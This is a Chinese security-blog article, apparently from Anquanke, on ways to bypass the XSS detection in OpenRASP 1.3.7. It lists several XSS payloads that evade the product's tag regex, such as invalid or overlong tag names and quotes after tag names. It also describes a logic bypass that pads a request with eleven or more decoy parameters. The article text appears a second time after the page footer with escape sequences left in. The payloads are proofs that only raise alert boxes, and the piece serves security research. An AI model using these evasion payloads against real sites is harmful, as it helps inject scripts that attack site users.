首页

阅读

• 安全资讯
• 安全知识
• 安全工具

活动

招聘

安全导航

内容精选

• 专栏
• 精选专题
• 安全客季刊
• 360网络安全周报

OpenRASP xss算法的几种绕过方法

阅读量237303

|评论1

|

发布时间 : 2021-07-21 14:30:43

x

译文声明

本文是翻译文章

译文仅供参考，具体内容表达以及含义原文为准。

 

openrasp默认只能检测反射型XSS，存储型XSS仅IAST商业版支持。对于反射型xss，openrasp也只能检测可控输出点在html标签外的情况，本文的绕过方法是针对这种情况。如果可控输出点在html标签内，如<input type="text" value="$input">或<script>...</script> 内部，openrasp几乎检测不到。

 

测试环境

windows / tomcat / jdk1.8 / openrasp 1.3.7-beta

测试环境部署参见https://www.anquanke.com/post/id/241107，或者官网文档。

在official.js中xss_userinput算法默认配置为ignore，修改为block来开启拦截。此时点击官方测试用例中下面链接，即可触发openrasp拦截。

 

openrasp xss算法

openrasp xss算法有2种。算法1是针对PHP环境，此处不考虑。算法2是用户输入匹配算法，根据注释说明，算法原理是”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”。

标签正则含义使用regexper网站解析如下

标签正则从整体上来说匹配两种情况，一是请求参数值中有子字符串以<! 开头的；二是请求参数值中有子字符串以< 开头的。对于第二种情况，标签正则会匹配< 字符后接1到12个大小写字母，再后接/ 或> 或0x00 - 0x20 字符的字符串。所以下面这些常见的xss测试payload都会拦截。

<script>alert(1)</script>         // "<script>"部分匹配标签正则
<img src=1 onerror=alert()>       // "<img "部分匹配正则，空格符对应正则中0x20
<svg/onload=alert()>              //  "<svg/"部分匹配正则

<img src=1 onerror=alert()>触发拦截

 

标签正则绕过

整理网上的一些xss 绕过payload，发现下面这些可以顺利绕过标签正则

<d3v/onmouseleave=[1].some(confirm)>click
<d3/onmouseenter=[2].find(confirm)>z
<d3"<"/onclick="1>[confirm``]"<">z
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

浏览器直接输入上面那些xss payload会报400响应错误。对payload进行url编码所有字符。

burpsuite repeater中右键”copy url”，复制url到浏览器中访问，点击即可触发弹框。

标签后接单双引号

收集过程中还发现下面这两种xss payload也可以绕过。

<a"/onclick=(confirm)()>click 
<a'/onclick=(confirm)()>click

简单测了下其他标签后接单引号或双引号进行绕过，好像蛮多都行的。

<button onclick=alert()>12</button>    // 拦截
<button' onclick=alert()>12</button>   // 点击弹框
<button" onclick=alert()>12</button>   // 点击弹框
<div onclick=alert()>12</div>          // 拦截
<div' onclick=alert()>12</div>         // 点击弹框
<div" onclick=alert()>12</div>         // 点击弹框

例如，使用123<img' src=1 onclick=alert()>123 ，url编码后，点击也能弹框。

构造无效标签

这种也可以用于绕过openrasp。看到这种绕过方式，感觉前面的都不香了。

只要构造如下payload即可

<abc1 onclick=confirm()>click here   // 标签名是字母+数字

验证如下

或者

<abcdefabcdefa onclick=confirm()>click here   // 标签名称长度大于12

 

程序逻辑绕过

还有一种绕过方法，是从程序检测逻辑上进行绕过。

openrasp xss具体检测代码实现在这个文件中agent/java/engine/src/main/java/com/baidu/openrasp/plugin/checker/local/XssChecker.java。下面的一段代码是对”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”的具体实现。

但代码中多了一处逻辑。如果请求会传递多个参数，当某个参数值长度大于15，且匹配之前的标签正则<![\-\[A-Za-z]|<([A-Za-z]{1,12})[\/\x00-\x20>] ，如果对应参数值没有在响应中出现时，变量count值会加1。当count值大于10时，openrasp会直接放行。控制程序运行到上面图片中第二个方框中即可产生绕过。

绕过演示

此处为了查看payload内容方便，使用了post请求。如果转换成get请求，并对参数值url编码，效果一样。

原始请求会触发拦截

绕过payload。在input参数前面添加多个input[n]的参数，且参数值为其他xss payload。

转换成get请求，并对payload进行编码。

绕过payload分析

构造的绕过payload有几点要求。一是，虚构的请求参数理论上至少要有11个，如前面input0到input11请求参数。如果没成功，最好在增加几个请求参数。二是，虚构的请求参数名取值有些要求。三是，虚构的请求参数值不能与真实请求参数值相同。

因为这样的话，input0到input11这些请求参数在parameterMap 中会排在input参数前面，见下图。

这样input0到input11这些参数就会优先input请求参数被openrasp检测逻辑处理，从而击中count > exceedLengthCount 的条件进行绕过。

 

参考资料

https://github.com/s0md3v/AwesomeXSS#awesome-tags—event-handlers

https://www.anquanke.com/post/id/173701

https://www.yuque.com/pmiaowu/web_security_1/scwgqm#JFw3a

本文翻译自 原文链接。如若转载请注明出处。

商务合作，文章发布请联系 anquanke@360.cn

本文由mattF123原创发布

转载，请参考转载声明，注明出处： https://www.anquanke.com/post/id/247612

安全客 - 有思想的安全新媒体

本文转载自:

如若转载,请注明出处：

安全客 - 有思想的安全新媒体

分享到：

• xss
• OpenRASP
• waf

+13赞

收藏

mattF123

分享到：

发表评论

您还未登录，请先登录。

登录

mattF123

这个人太懒了，签名都懒得写一个

• 文章
• 2

• 粉丝
• 1

TA的文章

• OpenRASP xss算法的几种绕过方法

  2021-07-21 14:30:43

• OpenRasp xxe算法的几种绕过方式

  2021-05-31 10:30:45

相关文章

• ShareGPT共享chatGPT会话存在XSS

  2023-03-10 14:00:34

• 2000亿！单日检测流量，长亭WAF花式演绎

  2023-02-27 14:31:40

• XSS跨站脚本攻击

  2022-05-09 11:00:26

• 写给研发同学的富文本安全过滤方案

  2021-12-23 14:30:39

• 【伽玛】第七届“湖湘杯” Pastebin | 设计思路与解析

  2021-12-01 12:00:26

• gomarkdown/markdown 项目的 XSS 漏洞产生与分析

  2021-08-23 15:30:08

• 探索DOM XSS一个trick的原理

  2021-08-23 10:30:08

热门推荐

文章目录

• 测试环境
• openrasp xss算法
• 标签正则绕过
  • 标签后接单双引号
  • 构造无效标签
• 程序逻辑绕过
  • 绕过演示
  • 绕过payload分析
• 参考资料

安全客

• 关于我们
• 联系我们
• 用户协议

商务合作

• 合作内容
• 联系方式
• 友情链接

内容需知

• 投稿须知
• 转载须知
• 官网QQ群8：819797106
• 官网QQ群3：830462644(已满)
• 官网QQ群2：814450983(已满)
• 官网QQ群1：702511263(已满)

合作单位

• 
• 

Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66

微信二维码

X

openrasp默认只能检测反射型XSS，存储型XSS仅IAST商业版支持。对于反射型xss，openrasp也只能检测可控输出点在html标签外的情况，本文的绕过方法是针对这种情况。如果可控输出点在html标签内，如<input type=\"text\" value=\"$input\">或<script>...</script> 内部，openrasp几乎检测不到。

测试环境

windows / tomcat / jdk1.8 / openrasp 1.3.7-beta

测试环境部署参见https://www.anquanke.com/post/id/241107，或者官网文档。

在official.js中xss_userinput算法默认配置为ignore，修改为block来开启拦截。此时点击官方测试用例中下面链接，即可触发openrasp拦截。

openrasp xss算法

openrasp xss算法有2种。算法1是针对PHP环境，此处不考虑。算法2是用户输入匹配算法，根据注释说明，算法原理是”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”。

标签正则含义使用regexper网站解析如下

标签正则从整体上来说匹配两种情况，一是请求参数值中有子字符串以<! 开头的；二是请求参数值中有子字符串以< 开头的。对于第二种情况，标签正则会匹配< 字符后接1到12个大小写字母，再后接/ 或> 或0x00 - 0x20 字符的字符串。所以下面这些常见的xss测试payload都会拦截。

<script>alert(1)</script>         // \"<script>\"部分匹配标签正则\r\n<img src=1 onerror=alert()>       // \"<img \"部分匹配正则，空格符对应正则中0x20\r\n<svg/onload=alert()>              //  \"<svg/\"部分匹配正则\r\n

<img src=1 onerror=alert()>触发拦截

标签正则绕过

整理网上的一些xss 绕过payload，发现下面这些可以顺利绕过标签正则

<d3v/onmouseleave=[1].some(confirm)>click\r\n<d3/onmouseenter=[2].find(confirm)>z\r\n<d3\"<\"/onclick=\"1>[confirm``]\"<\">z\r\n<w=\"/x=\"y>\"/ondblclick=`<`[confir\\u006d``]>z\r\n

浏览器直接输入上面那些xss payload会报400响应错误。对payload进行url编码所有字符。

burpsuite repeater中右键”copy url”，复制url到浏览器中访问，点击即可触发弹框。

\n标签后接单双引号

收集过程中还发现下面这两种xss payload也可以绕过。

<a\"/onclick=(confirm)()>click \r\n<a'/onclick=(confirm)()>click\r\n

简单测了下其他标签后接单引号或双引号进行绕过，好像蛮多都行的。

<button onclick=alert()>12</button>    // 拦截\r\n<button' onclick=alert()>12</button>   // 点击弹框\r\n<button\" onclick=alert()>12</button>   // 点击弹框\r\n<div onclick=alert()>12</div>          // 拦截\r\n<div' onclick=alert()>12</div>         // 点击弹框\r\n<div\" onclick=alert()>12</div>         // 点击弹框\r\n

例如，使用123<img' src=1 onclick=alert()>123 ，url编码后，点击也能弹框。

\n构造无效标签

这种也可以用于绕过openrasp。看到这种绕过方式，感觉前面的都不香了。

只要构造如下payload即可

<abc1 onclick=confirm()>click here   // 标签名是字母+数字\r\n

验证如下

或者

<abcdefabcdefa onclick=confirm()>click here   // 标签名称长度大于12\r\n

程序逻辑绕过

还有一种绕过方法，是从程序检测逻辑上进行绕过。

openrasp xss具体检测代码实现在这个文件中agent/java/engine/src/main/java/com/baidu/openrasp/plugin/checker/local/XssChecker.java。下面的一段代码是对”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”的具体实现。

但代码中多了一处逻辑。如果请求会传递多个参数，当某个参数值长度大于15，且匹配之前的标签正则<![\\-\\[A-Za-z]|<([A-Za-z]{1,12})[\\/\\x00-\\x20>] ，如果对应参数值没有在响应中出现时，变量count值会加1。当count值大于10时，openrasp会直接放行。控制程序运行到上面图片中第二个方框中即可产生绕过。

\n绕过演示

此处为了查看payload内容方便，使用了post请求。如果转换成get请求，并对参数值url编码，效果一样。

原始请求会触发拦截

绕过payload。在input参数前面添加多个input[n]的参数，且参数值为其他xss payload。

转换成get请求，并对payload进行编码。

\n绕过payload分析

构造的绕过payload有几点要求。一是，虚构的请求参数理论上至少要有11个，如前面input0到input11请求参数。如果没成功，最好在增加几个请求参数。二是，虚构的请求参数名取值有些要求。三是，虚构的请求参数值不能与真实请求参数值相同。

因为这样的话，input0到input11这些请求参数在parameterMap 中会排在input参数前面，见下图。

这样input0到input11这些参数就会优先input请求参数被openrasp检测逻辑处理，从而击中count > exceedLengthCount 的条件进行绕过。

参考资料

https://github.com/s0md3v/AwesomeXSS#awesome-tags—event-handlers

https://www.anquanke.com/post/id/173701

https://www.yuque.com/pmiaowu/web_security_1/scwgqm#JFw3a